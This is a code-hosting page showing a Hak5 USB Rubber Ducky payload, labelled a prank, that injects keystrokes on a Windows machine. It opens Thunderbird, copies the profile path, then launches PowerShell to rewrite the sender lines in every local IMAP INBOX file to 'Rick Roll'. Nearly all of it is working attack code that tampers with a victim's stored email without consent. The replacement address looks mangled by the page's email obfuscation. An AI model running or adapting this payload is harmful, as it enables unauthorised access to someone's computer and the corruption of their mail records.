Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
2968 views
1
REM #####################################################

2
REM #                                     		        #

3
REM # Title       : Prank In The Middle - Thunderbird   #

4
REM # Author      : Aleff                 		        #

5
REM # Version	  : 1.0                   		        #

6
REM # Category	  : Prank                 		        #

7
REM # Target	  : Windows 10/11         		        #

8
REM #                                     		        #

9
REM #####################################################

10


11
EXTENSION DETECT_READY

12
    REM VERSION 1.1

13
    REM AUTHOR: Korben

14


15
    REM_BLOCK DOCUMENTATION

16
        USAGE:

17
            Extension runs inline (here)

18
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic

19
            boot delay

20


21
        TARGETS:

22
            Any system that reflects CAPSLOCK will detect minimum required delay

23
            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms

24
    END_REM

25


26
    REM CONFIGURATION:

27
    DEFINE #RESPONSE_DELAY 25

28
    DEFINE #ITERATION_LIMIT 120

29


30
    VAR $C = 0

31
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))

32
        CAPSLOCK

33
        DELAY #RESPONSE_DELAY

34
        $C = ($C + 1)

35
    END_WHILE

36
    CAPSLOCK

37
END_EXTENSION

38


39
REM Open Thunderbird and goto settings

40
GUI r

41
STRING thunderbird

42
ENTER

43
DELAY 1000

44
REPEAT 4 TAB

45
ENTER

46
DELAY 500

47
REPEAT 2 UPARROW

48
ENTER

49
DELAY 500

50
REPEAT 3 UPARROW

51
ENTER

52
DELAY 500

53


54
REM Goto profile directory

55
REPEAT 11 TAB

56
ENTER

57
DELAY 500

58


59
REM Copy the directory path

60
REPEAT 4 TAB

61
DELAY 500

62
SPACE

63
DELAY 500

64
ENTER

65
DELAY 500

66
CTRL c

67
DELAY 500

68
ALT F4

69
DELAY 500

70


71
REM Open the powershell and goto the directory

72
GUI r

73
STRING powershell

74
ENTER

75
DELAY 1500

76
STRING cd 

77
DELAY 500

78
CTRL v

79
DELAY 500

80
ENTER

81
DELAY 500

82


83
REM Get the INBOX content and edit it overwriting. Then close the powershell

84
STRINGLN_POWERSHELL

85
    cd ImapMail

86
    $directories = Get-ChildItem -Directory | Select-Object FullName

87
    foreach ($dir in $directories) {

88
        # Replace backslashes with slash

89
        $newPath = $dir.FullName -replace '\\', '/'

90
        

91
        # Add the sub-string '/INBOX' to the end

92
        $newPath += "/INBOX"

93
        

94
        # Check whether the INBOX file exists

95
        if (Test-Path $newPath) {

96
            # Check whether the INBOX file exists

97
            $emails = Get-Content -Path $newPath -Raw

98


99
            # Replace email sender with Rick Roll!

100
            # The following operation is simplified and assumes that the sender starts with 'From: ...'

101
            # and does not contain complex MIME structures

102
            $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll <[email protected]/prinkrollme>"

103


104
            # Write the modified content into the INBOX file.

105
            Set-Content -Path $newPath -Value $modifiedEmails -Force

106
        }

107
    }

108
END_STRINGLN

109
DELAY 1000

110
ALT F4

111


112